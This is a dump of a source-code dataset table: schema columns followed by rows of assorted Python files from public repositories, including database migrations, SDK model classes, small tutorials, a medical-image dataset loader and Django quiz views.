blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b3a796f6f6e1d72469e523177fe6e9c9ac1fb9ff
|
94d5ef47d3244950a0308c754e0aa55dca6f2a0e
|
/migrations/versions/53e2ad0d34e3_added_produce_id_to_breed_table_instead.py
|
977835fba4e07675a127bd13b29394f31d921a8f
|
[] |
no_license
|
MUMT-IT/mis2018
|
9cbc7191cdc1bcd7e0c2de1e0586d8bd7b26002e
|
69fabc0b16abfeba44173caa93d4f63fa79033fd
|
refs/heads/master
| 2023-08-31T16:00:51.717449
| 2023-08-31T11:30:13
| 2023-08-31T11:30:13
| 115,810,883
| 5
| 5
| null | 2023-09-14T10:08:35
| 2017-12-30T17:06:00
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,288
|
py
|
"""added produce_id to breed table instead
Revision ID: 53e2ad0d34e3
Revises: e4f15449eb31
Create Date: 2018-02-03 22:51:38.297350
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '53e2ad0d34e3'
down_revision = 'e4f15449eb31'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('food_produce_breeds', sa.Column('produce_id', sa.Integer(), nullable=True))
op.create_foreign_key(None, 'food_produce_breeds', 'food_produces', ['produce_id'], ['id'])
op.drop_constraint(u'food_produces_produce_breed_id_fkey', 'food_produces', type_='foreignkey')
op.drop_column('food_produces', 'produce_breed_id')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('food_produces', sa.Column('produce_breed_id', sa.INTEGER(), autoincrement=False, nullable=True))
op.create_foreign_key(u'food_produces_produce_breed_id_fkey', 'food_produces', 'food_produce_breeds', ['produce_breed_id'], ['id'])
op.drop_constraint(None, 'food_produce_breeds', type_='foreignkey')
op.drop_column('food_produce_breeds', 'produce_id')
# ### end Alembic commands ###
|
[
"likit.pre@mahidol.edu"
] |
likit.pre@mahidol.edu
|
3124b674fa821716127a4d34ee60d1afc948da96
|
7000895fad6f4c23084122ef27b3292d5e57df9f
|
/src/xrd/crypto/Qryptonight.py
|
1475f988d07b1c8d0513eab0742c2dab0685602f
|
[
"MIT"
] |
permissive
|
jack3343/xrd-core
|
1302cefe2a231895a53fcef73e558cdbc1196884
|
48a6d890d62485c627060b017eadf85602268caf
|
refs/heads/master
| 2022-12-15T07:36:16.618507
| 2020-08-27T09:21:36
| 2020-08-27T09:21:36
| 290,652,706
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,140
|
py
|
# coding=utf-8
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
import threading
from xrd.core import config
from xrd.core.Singleton import Singleton
from xrd.crypto.Qryptonight7 import Qryptonight7
from xrd.crypto.QRandomX import QRandomX
class Qryptonight(object, metaclass=Singleton):
def __init__(self):
self.lock = threading.Lock()
self._qryptonight_7 = Qryptonight7()
self._qrandom_x = QRandomX()
def get_qn(self, block_number):
if block_number < config.dev.hard_fork_heights[0]:
return self._qryptonight_7
else:
return self._qrandom_x
def get_seed_height(self, block_number):
return self._qrandom_x.get_seed_height(block_number)
def hash(self, block_number, seed_height, seed_hash, blob):
with self.lock:
if block_number < config.dev.hard_fork_heights[0]:
return bytes(self._qryptonight_7.hash(blob))
else:
return bytes(self._qrandom_x.hash(block_number, seed_height, seed_hash, blob))
|
[
"70303530+jack3343@users.noreply.github.com"
] |
70303530+jack3343@users.noreply.github.com
|
d3407c1815d554881ce33812bf3dfc89430fe36f
|
2521e6427a7668d8cc91eabb368a5cf0eb7310f9
|
/Cap18-Extras/09_dimensionar.py
|
5872547aa4d77143e41c6c59a3c7fd24ab1da260
|
[] |
no_license
|
frclasso/turma3_Python1_2018
|
4a7bc0ba0eb538100400c15fc5c5b3ac1eeb7e50
|
47cd3aaa6828458b7f5164a8bce717bb8dd83a7c
|
refs/heads/master
| 2020-04-06T16:18:00.889198
| 2019-06-10T15:11:32
| 2019-06-10T15:11:32
| 157,614,408
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 284
|
py
|
#!/usr/bin/env python3
import openpyxl
wb = openpyxl.Workbook()
#print(wb.sheetnames)
sheet = wb.active
sheet['A1'] = 'Tall row'
sheet['B2'] = 'Wide column'
sheet.row_dimensions[1].height = 70
sheet.column_dimensions['B'].widht = 50
wb.save('dimensions.xlsx')
print('Feito...')
|
[
"frcalsso@yahoo.com.br"
] |
frcalsso@yahoo.com.br
|
1bb77fc8dacaeb560a91eefb770e6455bfb58186
|
add0bb7a309ea346614d7f560a24e653d3d0ff67
|
/Python多线程/多线程.py
|
141bbbb34bec2b4895f11d7847ae4c8244b89526
|
[] |
no_license
|
1572903465/PythonProjects
|
935aff08d5b3d3f146393764a856369061513d36
|
73576080174f72ea1df9b36d201cf3949419041b
|
refs/heads/master
| 2023-06-10T15:50:49.178112
| 2021-07-05T15:42:53
| 2021-07-05T15:42:53
| 301,328,267
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 801
|
py
|
import time
import threading
#GIL是解释器用于同步线程的一种机制
#它使得任何时刻仅有一个线程在执行 (就算你是多核处理器也一样)
#使用GIL的解释器只允许同一时间执行一个线程
#常见的使用GIL的解释器有 CPython 与 Ruby MRI
#如果你用JPython没有GIL锁
#CPU 多线程
def start():#单纯计算 消耗CPU资源 没有实际意义
data = 0
for _ in range(10000000):#连续加
data += 1
return
if __name__ == "__main__":
time_data = time.time()
ts = {}
for i in range(10):
t = threading.Thread(target = start)#target参数填函数名 不要用括号
t.start()
ts[i] = t #全新的线程
for i in range(10):
ts[i].join()
print(time.time() - time_data)
|
[
"1572903465@qq.com"
] |
1572903465@qq.com
|
8a9f2c084e5fbff4425c903743db38ff3e08f6e7
|
e7d1e06b5686f87280db292863b34ce0ea530d94
|
/src/examples/func_local.py
|
151515b33e59143e74c36eb6b6361a128c4ad393
|
[] |
no_license
|
tobereborn/byte-of-python2
|
4e9abdb3c513f8b5aa3955873b7468ddb60c8883
|
c7e06be6f246dc6292780d59de0806b19c086943
|
refs/heads/master
| 2021-01-12T04:25:00.536489
| 2017-02-07T02:06:23
| 2017-02-07T02:06:23
| 77,606,492
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 213
|
py
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
'''
Created on Dec 31, 2016
@author: weizhen
'''
def func(x):
print 'Local x is', x
x = 2
print 'Change local x to', x
x = 50
func(x)
print 'x is still', x
|
[
"none"
] |
none
|
5725565c8233d54c532088ebda905dca10d51e65
|
9b64f0f04707a3a18968fd8f8a3ace718cd597bc
|
/huaweicloud-sdk-servicestage/huaweicloudsdkservicestage/v2/model/create_o_auth_request.py
|
6759129234f47c48a4eb8652297aba7bde7df202
|
[
"Apache-2.0"
] |
permissive
|
jaminGH/huaweicloud-sdk-python-v3
|
eeecb3fb0f3396a475995df36d17095038615fba
|
83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b
|
refs/heads/master
| 2023-06-18T11:49:13.958677
| 2021-07-16T07:57:47
| 2021-07-16T07:57:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,107
|
py
|
# coding: utf-8
import re
import six
class CreateOAuthRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'repo_type': 'str',
'tag': 'str',
'body': 'OAuth'
}
attribute_map = {
'repo_type': 'repo_type',
'tag': 'tag',
'body': 'body'
}
def __init__(self, repo_type=None, tag=None, body=None):
"""CreateOAuthRequest - a model defined in huaweicloud sdk"""
self._repo_type = None
self._tag = None
self._body = None
self.discriminator = None
self.repo_type = repo_type
if tag is not None:
self.tag = tag
if body is not None:
self.body = body
@property
def repo_type(self):
"""Gets the repo_type of this CreateOAuthRequest.
仓库类型。 支持OAuth授权的仓库类型有:github、gitlab、gitee、bitbucket。
:return: The repo_type of this CreateOAuthRequest.
:rtype: str
"""
return self._repo_type
@repo_type.setter
def repo_type(self, repo_type):
"""Sets the repo_type of this CreateOAuthRequest.
仓库类型。 支持OAuth授权的仓库类型有:github、gitlab、gitee、bitbucket。
:param repo_type: The repo_type of this CreateOAuthRequest.
:type: str
"""
self._repo_type = repo_type
@property
def tag(self):
"""Gets the tag of this CreateOAuthRequest.
站点标签。 比如国际站的,?tag=intl。 默认为空。
:return: The tag of this CreateOAuthRequest.
:rtype: str
"""
return self._tag
@tag.setter
def tag(self, tag):
"""Sets the tag of this CreateOAuthRequest.
站点标签。 比如国际站的,?tag=intl。 默认为空。
:param tag: The tag of this CreateOAuthRequest.
:type: str
"""
self._tag = tag
@property
def body(self):
"""Gets the body of this CreateOAuthRequest.
:return: The body of this CreateOAuthRequest.
:rtype: OAuth
"""
return self._body
@body.setter
def body(self, body):
"""Sets the body of this CreateOAuthRequest.
:param body: The body of this CreateOAuthRequest.
:type: OAuth
"""
self._body = body
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CreateOAuthRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
e216c2feeb68eba1c8976b72040c3a84d2b3c578
|
e2ba1e3d001902e50f1dc9a63baf2a8abcac3ed8
|
/InnerEye-DataQuality/InnerEyeDataQuality/datasets/nih_cxr.py
|
91776355375965f599295af3453238326df7cff1
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
RobinMarshall55/InnerEye-DeepLearning
|
81f52e7429f942e8c9845958d5b586e19e14e351
|
8495a2eec3903957e3e81f81a0d2ad842d41dfe2
|
refs/heads/main
| 2023-08-15T19:46:38.017713
| 2021-10-22T14:13:56
| 2021-10-22T14:13:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,929
|
py
|
# ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
import logging
from pathlib import Path
from typing import Callable, List, Optional, Tuple, Dict, Union
import PIL
from PIL import Image
from torch.utils.data import Dataset
import numpy as np
import pandas as pd
NIH_TOTAL_SIZE = 112120
class NIHCXR(Dataset):
def __init__(self,
data_directory: str,
use_training_split: bool,
seed: int = 1234,
shuffle: bool = True,
transform: Optional[Callable] = None,
num_samples: int = None,
return_index: bool = True) -> None:
"""
Class for the full NIH ChestXray Dataset (112k images)
:param data_directory: the directory containing all training images from the dataset as well as the
Data_Entry_2017.csv file containing the dataset labels.
:param use_training_split: whether to return the training or the test split of the dataset.
:param seed: random seed to use for dataset creation
:param shuffle: whether to shuffle the dataset prior to spliting between validation and training
:param transform: a preprocessing function that takes a PIL image as input and returns a tensor
:param num_samples: number of the samples to return (has to been smaller than the dataset split)
"""
self.data_directory = Path(data_directory)
if not self.data_directory.exists():
logging.error(
f"The data directory {self.data_directory} does not exist. Make sure to download the NIH data "
f"first.The dataset can on the main page"
"https://www.kaggle.com/nih-chest-xrays/data. Make sure all images are placed directly under the "
"data_directory folder. Make sure you downloaded the Data_Entry_2017.csv file to this directory as"
"well.")
self.train = use_training_split
self.seed = seed
self.random_state = np.random.RandomState(seed)
self.dataset_dataframe = pd.read_csv(self.data_directory / "Data_Entry_2017.csv")
self.dataset_dataframe["pneumonia_like"] = self.dataset_dataframe["Finding Labels"].apply(
lambda x: x.split("|")).apply(lambda x: "pneumonia" in x.lower()
or "infiltration" in x.lower()
or "consolidation" in x.lower())
self.transforms = transform
orig_labels = self.dataset_dataframe.pneumonia_like.values.astype(np.int64)
subjects_ids = self.dataset_dataframe["Image Index"].values
is_train_ids = self.dataset_dataframe["train"].values
self.num_classes = 2
self.indices = np.where(is_train_ids)[0] if use_training_split else np.where(~is_train_ids)[0]
self.indices = self.random_state.permutation(self.indices) \
if shuffle else self.indices
# ------------- Select subset of current split ------------- #
if num_samples is not None:
assert 0 < num_samples <= len(self.indices)
self.indices = self.indices[:num_samples]
self.subject_ids = subjects_ids[self.indices]
self.orig_labels = orig_labels[self.indices].reshape(-1)
self.targets = self.orig_labels
# Identify case ids for ambiguous and clear label noise cases
self.ambiguity_metric_args: Dict = dict()
dataset_type = "TRAIN" if use_training_split else "VAL"
logging.info(f"Proportion of positive labels - {dataset_type}: {np.mean(self.targets)}")
logging.info(f"Number samples - {dataset_type}: {self.targets.shape[0]}")
self.return_index = return_index
def __getitem__(self, index: int) -> Union[Tuple[int, PIL.Image.Image, int], Tuple[PIL.Image.Image, int]]:
"""
:param index: The index of the sample to be fetched
:return: The image and label tensors
"""
subject_id = self.subject_ids[index]
filename = self.data_directory / f"{subject_id}"
target = self.targets[index]
scan_image = Image.open(filename).convert("L")
if self.transforms is not None:
scan_image = self.transforms(scan_image)
if self.return_index:
return index, scan_image, int(target)
return scan_image, int(target)
def __len__(self) -> int:
"""
:return: The size of the dataset
"""
return len(self.indices)
def get_label_names(self) -> List[str]:
return ["NotPneunomiaLike", "PneunomiaLike"]
|
[
"noreply@github.com"
] |
RobinMarshall55.noreply@github.com
|
a9adbd9757605899cfcc24ab62f85a0506576082
|
9923e30eb99716bfc179ba2bb789dcddc28f45e6
|
/apimatic/python_generic_lib/Samsara+API-Python/samsaraapi/models/tag_1.py
|
c430f1f458ea4d2ca686481440b43d895aaab5a2
|
[
"MIT"
] |
permissive
|
silverspace/samsara-sdks
|
cefcd61458ed3c3753ac5e6bf767229dd8df9485
|
c054b91e488ab4266f3b3874e9b8e1c9e2d4d5fa
|
refs/heads/master
| 2020-04-25T13:16:59.137551
| 2019-03-01T05:49:05
| 2019-03-01T05:49:05
| 172,804,041
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,770
|
py
|
# -*- coding: utf-8 -*-
"""
samsaraapi
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
class Tag1(object):
"""Implementation of the 'Tag1' model.
TODO: type model description here.
Attributes:
id (long|int): The ID of this tag.
name (string): Name of this tag.
parent_tag_id (long|int): The ID of this tag.
"""
# Create a mapping from Model property names to API property names
_names = {
"id":'id',
"name":'name',
"parent_tag_id":'parentTagId'
}
def __init__(self,
id=None,
name=None,
parent_tag_id=None):
"""Constructor for the Tag1 class"""
# Initialize members of the class
self.id = id
self.name = name
self.parent_tag_id = parent_tag_id
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
id = dictionary.get('id')
name = dictionary.get('name')
parent_tag_id = dictionary.get('parentTagId')
# Return an object of this model
return cls(id,
name,
parent_tag_id)
|
[
"greg@samsara.com"
] |
greg@samsara.com
|
22e0f4ddf70d8a6df31ef25ad3c9523dd8105a3a
|
ac89e5d51d0d15ffdecfde25985c28a2af9c2e43
|
/test/test_match_alliance.py
|
931bc1a9d817c762a45d35d742fc1774fbbb67f5
|
[] |
no_license
|
TBA-API/tba-api-client-python
|
20dc4a634be32926054ffc4c52b94027ee40ac7d
|
4f6ded8fb4bf8f7896891a9aa778ce15a2ef720b
|
refs/heads/master
| 2021-07-15T16:36:32.234217
| 2020-05-07T00:20:43
| 2020-05-07T00:20:43
| 134,112,743
| 4
| 8
| null | 2019-07-01T03:14:12
| 2018-05-20T02:13:45
|
Python
|
UTF-8
|
Python
| false
| false
| 1,191
|
py
|
# coding: utf-8
"""
The Blue Alliance API v3
# Overview Information and statistics about FIRST Robotics Competition teams and events. # Authentication All endpoints require an Auth Key to be passed in the header `X-TBA-Auth-Key`. If you do not have an auth key yet, you can obtain one from your [Account Page](/account). A `User-Agent` header may need to be set to prevent a 403 Unauthorized error. # noqa: E501
The version of the OpenAPI document: 3.04.1
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import tbaapiv3client
from tbaapiv3client.models.match_alliance import MatchAlliance # noqa: E501
from tbaapiv3client.rest import ApiException
class TestMatchAlliance(unittest.TestCase):
"""MatchAlliance unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testMatchAlliance(self):
"""Test MatchAlliance"""
# FIXME: construct object with mandatory attributes with example values
# model = tbaapiv3client.models.match_alliance.MatchAlliance() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"travis@example.org"
] |
travis@example.org
|
8f152a314ef63e887d0f8e569075306ee1396908
|
4ae3b27a1d782ae43bc786c841cafb3ace212d55
|
/Test_Slen/Pytest_proj/01/Scripts/rst2latex.py
|
61137b0e6f44ef69c8780b8663fadf71a62bbb4b
|
[] |
no_license
|
bopopescu/Py_projects
|
c9084efa5aa02fd9ff6ed8ac5c7872fedcf53e32
|
a2fe4f198e3ca4026cf2e3e429ac09707d5a19de
|
refs/heads/master
| 2022-09-29T20:50:57.354678
| 2020-04-28T05:23:14
| 2020-04-28T05:23:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 844
|
py
|
#!c:\users\jsun\documents\py_projects\pytest_proj\01\scripts\python.exe
# $Id: rst2latex.py 5905 2009-04-16 12:04:49Z milde $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing LaTeX.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline
description = ('Generates LaTeX documents from standalone reStructuredText '
'sources. '
'Reads from <source> (default is stdin) and writes to '
'<destination> (default is stdout). See '
'<http://docutils.sourceforge.net/docs/user/latex.html> for '
'the full reference.')
publish_cmdline(writer_name='latex', description=description)
|
[
"sunusd@yahoo.com"
] |
sunusd@yahoo.com
|
9baf84a3f128fbdc8787947c099b5f83b777bbc7
|
1285703d35b5a37734e40121cd660e9c1a73b076
|
/aizu_online_judge/tree/7_d_solution.py
|
70efa80577b60594e3d0ffb0dedc8489925e85a8
|
[] |
no_license
|
takin6/algorithm-practice
|
21826c711f57131108168775f08e4e13d07a3b38
|
f4098bea2085a77d11c29e1593b3cc3f579c24aa
|
refs/heads/master
| 2022-11-30T09:40:58.083766
| 2020-08-07T22:07:46
| 2020-08-07T22:07:46
| 283,609,862
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 985
|
py
|
class Node():
def __init__(self, parent = -1, left = -1, right = -1):
self.parent = parent
self.left = left
self.right = right
def postorder(ns, i, post):
if ns[i].left != -1:
postorder(ns, ns[i].left, post)
if ns[i].right != -1:
postorder(ns, ns[i].right, post)
post.append(str(i + 1))
def poio_node(ns, po, io):
p = po[0]
i = io.index(p)
if i != 0:
ns[p].left = po[1]
ns[po[1]].parent = p
poio_node(ns, po[1:i + 1], io[:i])
if i != len(io) -1:
ns[p].right = po[i + 1]
ns[po[1 + i]].parent = p
poio_node(ns, po[i + 1:], io[i + 1:])
def min1(n):
return n - 1
n = int(input())
po = list(map(int, input().split()))
io = list(map(int, input().split()))
po = list(map(min1, po))
io = list(map(min1, io))
ns = [Node() for i in range(n)]
poio_node(ns, po, io)
post = []
postorder(ns, po[0], post)
print(" ".join(post))
|
[
"takayukiinoue116@gmail.com"
] |
takayukiinoue116@gmail.com
|
cd8c39eff00b00f3071855b64494d6159d08584a
|
45b64f620e474ac6d6b2c04fbad2730f67a62b8e
|
/Varsity-Final-Project-by-Django-master/.history/project/quiz/views_20210423112204.py
|
7280d320c23c7ccb25ba0eff899768fde6d05502
|
[] |
no_license
|
ashimmitra/Final-Project
|
99de00b691960e25b1ad05c2c680015a439277e0
|
a3e1d3c9d377e7b95b3eaf4dbf757a84a3858003
|
refs/heads/master
| 2023-04-11T06:12:35.123255
| 2021-04-26T15:41:52
| 2021-04-26T15:41:52
| 361,796,607
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 974
|
py
|
from django.shortcuts import render
from quiz.models import Quiz
from quiz.models import Bangla
from quiz.models import Math
from quiz.models import Science
from quiz.models import GK
#def welcome(request):
#return render(request, 'welcome.html')
def english(request):
questions = Quiz.objects.all()
return render(request, 'english.html', { 'questions': questions})
def bangla(request):
questions = Bangla.objects.all()
return render(request, 'bangla.html', { 'questions': questions})
def math(request):
questions = Math.objects.all()
return render(request, 'math.html', { 'questions': questions})
def science(request):
questions = Science.objects.all()
return render(request, 'science.html', { 'questions': questions})
def generalknowledge(request):
questions = GK.objects.all()
return render(request, 'generalknowledge.html', { 'questions': questions})
def result(request):
return render(request, 'result.html')
|
[
"34328617+ashimmitra@users.noreply.github.com"
] |
34328617+ashimmitra@users.noreply.github.com
|
c0ecc3296cd811fe782785ac56a926a7383d5c13
|
128b3bb5e5e3797ea73b8d71ec479b02d2d02b75
|
/py/h2o_nodes.py
|
55df64bb6144d92806a795cb08cbf9c422050764
|
[
"Apache-2.0"
] |
permissive
|
JerryZhong/h2o
|
14819b044466dffe4ec461cb154898610f6be8b3
|
c8ce6d223786673b5baf28f26d653bf4bd9f4ba9
|
refs/heads/master
| 2021-01-17T10:12:35.547837
| 2014-11-07T11:05:47
| 2014-11-07T11:05:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 292
|
py
|
# does the globally visible update behavior on these depend on them being mutables?
# to get rid of circular imports
# should think of managing this differently
print "h2o_nodes"
nodes = []
# used to get a browser pointing to the last RFview
global json_url_history
json_url_history = []
|
[
"kevin@0xdata.com"
] |
kevin@0xdata.com
|
ccedc17ba5f223b2b46ee55cbe835f9f835c7af1
|
2cf1f60d5adcc9fe56366e26b95860a440bcb230
|
/Previous Year CodeVita/Travel_Cost.py
|
3818cb399113612f5e097dfbda7f072ec2e90394
|
[] |
no_license
|
rohanJa/DSA_IMP
|
619a7b5c89b55cbff3c77b265242c05ebedd6140
|
b0ead018814d53a00cc47cda1915ad0dfe5c30dc
|
refs/heads/master
| 2022-12-23T22:56:32.775027
| 2020-09-01T06:52:25
| 2020-09-01T06:52:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 463
|
py
|
import heapq
N = int(input())
cities = list(map(int, input().split(' ')))
M = int(input())
if(len(cities)<=1 or cities[-1]==-1):
print(-1)
else:
cost = cities[0] + cities[-1]
cities = cities[1:len(cities)-1]
heapq.heapify(cities)
for i in range(0,len(cities)):
if(cities[i]==-1):
M-=1
else:
cost+=cities[i]
if(M<0):
print(-1)
else:
print(cost - sum(heapq.nlargest(M,cities)))
|
[
"pkopergaonkar@gmail.com"
] |
pkopergaonkar@gmail.com
|
741f4f977054d674b6570a9cbd439392f1bdf378
|
c8a0f1ee8ca4b27d6b71e1a358f950a5f168b953
|
/Sessão 4/Atributos de classe/Encapsulamento.py
|
cf204b06b1de3f55ff1b2bc2ec9d5e83d5a6d641
|
[] |
no_license
|
natanaelfelix/Estudos
|
0c3a54903a5ac457c1c1cfbdc22202683c46b62c
|
10b33fa7cb8521d63ea6a14c04894a5f7e86ee0c
|
refs/heads/master
| 2022-12-16T12:07:45.088305
| 2020-09-19T19:56:07
| 2020-09-19T19:56:07
| 296,936,330
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,553
|
py
|
#esconde codigos em python
'''
public, # metodos e atributos podem ser acesso dentro e fora da class,
protect # atributos que podem ser acesso apenas dentro da classe ou nas filhas da classe
private # atributo ou metodo só está disponível dentro da classe
em python:
isso é chamado de convenção
_ = é o mesmo que é privado, as é um protected mais fraco
__ = é o mesmo que privado, diz que não se deve usar em hipotese nenhuma
para acessar o real do pivado:
(instancia_nomedaclasse__nomedoatributo)
#tudo isso para proteger a aplicação
'''
class BaseDeDados:
def __init__(self):
#self.dados = {} # essa é publica, acessada de dentro e fora da classe, caso seja mudado esse valor de variável quebra toda a classe
#self.__dados = {} #usando o _ na frente do nome ele diz q é privado e não consiguimos utilizar de fora
self.__dados = {} #usando so dois __ ele não deixa utilizar, se caso utilizarmo sd fora ele cria outro atributo
def inserir_cliente(self, id, nome):
if 'clientes' not in self.__dados:
self.__dados['clientes'] = {id: nome}
else:
self.__dados['clientes'].update({id: nome})
def lista_clientes(self):
for id, nome in self.__dados['clientes'].items():
print(id, nome)
def apaga_cliente(self, id):
del self.__dados['clientes'][id]
bd = BaseDeDados()
bd.inserir_cliente(1, 'Adriano')
bd.inserir_cliente(2, 'Ronaldo')
bd.inserir_cliente(3, 'Priscila')
bd.apaga_cliente(2)
bd.lista_clientes()
print(bd.__dados)
|
[
"natanaelmartinsfelix@hotmail.com"
] |
natanaelmartinsfelix@hotmail.com
|
597dd8723ef677cd5e0dad4d6aa1daa7d951b79b
|
6d4a7f3f069e68a984df61b718e39597370a1131
|
/main/getmail
|
0b93cfc2d2cab97af7695d7546feb81af95b343b
|
[] |
no_license
|
nabiuddin6/scripts-1
|
d7c32a483c1ed4fcca2df3d68bf29cabf81f69c7
|
7a36fa22cfc369ccc5038332f95779370b12507c
|
refs/heads/master
| 2022-09-01T07:14:31.211758
| 2020-05-30T19:20:02
| 2020-05-30T19:20:02
| 270,788,454
| 1
| 0
| null | 2020-06-08T18:55:19
| 2020-06-08T18:55:18
| null |
UTF-8
|
Python
| false
| false
| 158
|
#!/usr/bin/env python3
from fileinput import input as finput
with open("/tmp/mymail.txt", "w") as f:
for line in finput():
print(line, file=f)
|
[
"bryanbugyi34@gmail.com"
] |
bryanbugyi34@gmail.com
|
|
847d6cf04f173be81615f171ab5efce76b4cb626
|
7b5828edda7751700ca7002b40a214e39e5f48a8
|
/EA/core/sims4/localization/localization_validation.py
|
2a309a8565c9d42b05bb9dcda2a6797caada7ad5
|
[] |
no_license
|
daniela-venuta/Sims-4-Python-Script-Workspace
|
54c33dac02f84daed66f46b7307f222fede0fa62
|
f408b28fb34626b2e3b2953152343d591a328d66
|
refs/heads/main
| 2023-03-29T18:08:39.202803
| 2021-03-30T19:00:42
| 2021-03-30T19:00:42
| 353,111,243
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,400
|
py
|
from protocolbuffers.Localization_pb2 import LocalizedStringToken
import sims4.log
import sims4.reload
logger = sims4.log.Logger('Localization', default_owner='epanero')
with sims4.reload.protected(globals()):
_localized_string_validators = {}
def register_localized_string_validator(validator_gen):
key = validator_gen.__module__ + validator_gen.__qualname__
_localized_string_validators[key] = validator_gen
def get_all_strings_to_validate_gen():
for validator_gen in _localized_string_validators.values():
try:
for localized_string_msg in validator_gen():
if localized_string_msg.hash:
yield localized_string_msg
except Exception as ex:
logger.error('Validator {} threw an exception: {}', validator_gen, ex)
class _LocalizationValidatorPlaceholderSim:
def __init__(self, is_female=False):
self._first_name = 'Jane' if is_female else 'John'
self._last_name = 'Doe'
self._is_female = is_female
def populate_localization_token(self, token):
token.type = LocalizedStringToken.SIM
token.first_name = self._first_name
token.last_name = self._last_name
token.is_female = self._is_female
def get_random_localization_token_sim(*args, **kwargs):
return _LocalizationValidatorPlaceholderSim(*args, **kwargs)
|
[
"44103490+daniela-venuta@users.noreply.github.com"
] |
44103490+daniela-venuta@users.noreply.github.com
|
5275b4089eb109d30621e280794a8c6e7ffdb7c3
|
8629f82f971f4e036c2b6358fe353a2c88bfd098
|
/scripts/extract_sequences.py
|
7c9b28f7fd0a5f74999951dd2fde3dae357dfaa0
|
[
"MIT"
] |
permissive
|
mahajrod/MAVR
|
92828fa1c191b5f8ed08f1ba33f1684df09742cd
|
8c57ff5519f130357e36e6f12868bc997e52a8a7
|
refs/heads/master
| 2023-08-25T01:02:24.738724
| 2023-08-22T15:13:39
| 2023-08-22T15:13:39
| 21,181,911
| 11
| 6
| null | 2017-09-18T20:25:16
| 2014-06-24T21:45:57
|
Python
|
UTF-8
|
Python
| false
| false
| 1,793
|
py
|
